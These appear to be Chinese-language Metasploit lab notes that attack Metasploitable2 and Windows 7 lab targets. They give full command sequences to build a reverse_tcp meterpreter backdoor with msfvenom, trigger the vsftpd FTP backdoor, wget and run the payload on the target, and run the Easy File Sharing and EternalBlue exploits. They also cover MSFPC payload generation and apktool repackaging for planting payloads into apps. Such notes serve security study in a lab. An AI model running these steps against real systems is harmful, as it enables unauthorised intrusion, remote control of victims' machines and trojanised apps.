1、利用FTP漏洞并植入后门
实验靶机:Metasploitable2。
实践:
- 使用nmap扫描目标靶机
- nmap -sV xxx.xxx.xxx.xxx(目标ip)
- 生成linux系统后门
- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx(主控端ip) LPORT=5555 -f elf -o /home/xxxx(用户名)/backdoor.elf
- 使用Apache服务在目标主机上下载后门
- sudo service apache2 start
- sudo cp home/xxxx(用户名)/backdoor.elf /var/www/html/
- 在主控端浏览器打开apache服务的ip地址,然后右键elf文件,选择Copy Link Location。
- 手工激活ftp后门。登录名:user:)。密码:pass
- 在主控端命令行输入:ftp xxx.xxx.xxx.xxx(靶机ip)。
- 输入登录名密码即可。
- 可以通过:nc xxx.xxx.xxx.xxx(靶机ip)。尝试判断是否启用成功。
- 然后在nc的命令行中执行下面的命令,这个地址就是你之前右键复制的那个地址。
- wget http://192.168.10.129/backdoor.elf。
- 然后可以通过 cd / --> ls命令。看有没有这个文件。
- 然后,启用主控端。打开Metasploit,就跟之前一样。
- use exploit/multi/handler
- set payload linux/x86/meterpreter/reverse_tcp
- set lhost xxx.xxx.xxx.xxx(主控端ip)
- set lport 5555
- run
- 在目标主机上运行后门。以下命令在nc的命令行中操作:
- ./backdoor.elf。你会发现权限不足。
- chmod 7777 ./backdoor.elf。
- 然后再执行就可以了:./backdoor.elf。
- 然后,你就可以在meterpreter中为所欲为了。
2、常用攻击软件
由于Windows7使用了比较安全的机制,所以入侵win7远比入侵Windows xp要难得多。虽然系统本身很安全,但是我们不可能只安装一个系统,就什么都没有了,系统内我们还会安装很多软件,我们就可以从这些应用软件入手,去寻找他们的漏洞,借助这些软件做跳板,去入侵系统。
之前我们使用的是python脚本去攻击Easy File Sharing软件,使软件卡死。并成功在目标计算机上打开了计算器,这回我们使用Metasploit来攻击这个应用程序。
实验靶机:Windows7。
实践:
- search easyfilesharing。
- use exploit/windows/http/easyfilesharing_seh。
- set rhost xxx.xxx.xxx.xxx(目标ip)。
- set lport 6666。
- run。
- execute -f calc.exe。打开计算器。
3、攻击Windows7系统蓝屏
实验靶机:Windows7。
实践:
- search ms17-010。
- use exploit/windows/smb/ms17_010_eternalblue。
- set rhost xxx.xxx.xxx.xxx(目标ip)。
- set lport 6666。
- set payload windows/meterpreter/reverse_tcp。
- run。
- 然后Windows就蓝屏了。
4、漏洞利用工具集:MSFPC
生成payload的默认工具是MSFvenom,这是一个独立于Metasploit的payload生成器及编辑器。虽然它是一个非常强的payload生成神器,但是对于一个新手来说,可能难以在短时间内熟悉其操作。即使在进程最初的了解之后,生成一个基本的payload也需要输入相当多的内容。
MSFPC,或者说是MSFvenom Payload生成器,其实是一个基于MSFvenom的payload生成器,它简化了基本的有效载荷创建过程,用户使用MSFPC可以尽可能简单的创建Payload。
使用方法:
- 漏洞利用工具集 --> msf payload creator --> 打开他。
- sudo msfpc windows xxx.xxx.xxx.xxx(当前主机ip) 6666。
- 然后会生成这么多东西:
- 其实就是把我们之前通过手动配置的东西都自动生成了。包括可执行文件、命令脚本等。我们看下如何来使用这些东西
- sudo service apache2 start。
- 跟之前一样,把刚才生成的可执行文件复制到Apache目录下。这里不写了。
- msfconsole -q -r [上面生成的那个.rc文件地址]
- 查看session
- 使用session。
- 成功!
5、Payload 介绍
病毒通常会做一些有害的或者恶意的动作。在病毒代码中实现这个功能的部分叫做“有效载荷(Payload)”。Payload可以实现任何运行在受害者环境中的程序所能做的事情。并且能够执行动作包括破坏文件、删除文件、向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。
Payloads模块,也叫有效载荷或有效负载,也就是我们常说的shellcode。在MSF中为我们提供了大量的Payloads。我们可以再MSF中通过show payloads命令查看。
payloads模块的命名规则
操作系统/类型/模块名称:windows/shell/bind_tcp。
- shell_find_taf:在一个已建立的链接上创建一个shell
- shell_reverse_tcp:反向链接到攻击者主机并创建一个shell
- bind_tcp:监听一个tcp链接。
- reverse_tcp:反向建立tcp链接。
- add_user:创建一个新用户并添加到管理组。
payloads模块等级
等级代表好用程度,一般分为以下几个等级:
- normal:正常
- excellent:优秀
- great:极好
- good:好
- average:一般、平均
- manual:手动
查看payloads下的某个模块的详细信息
- info [模块名]
- info windows/shell/bind_tcp
6、apk文件的反编译
1)什么是逆向工程?反编译?
就是将已有的APP程序,反向操作,方便我们查看里面的原始文件,因为我们平时拿到的APP程序都是经过加密处理的。
2)反编译有什么用?
可以用来分析APP,比如获取IP地址。将payload植入其他APP等等。
3)APK反编译软件——apktool
- 反编译apk文件
- apktool d xxx.apk
- 将反编译后的文件重新打包
- apktool b xxx.apk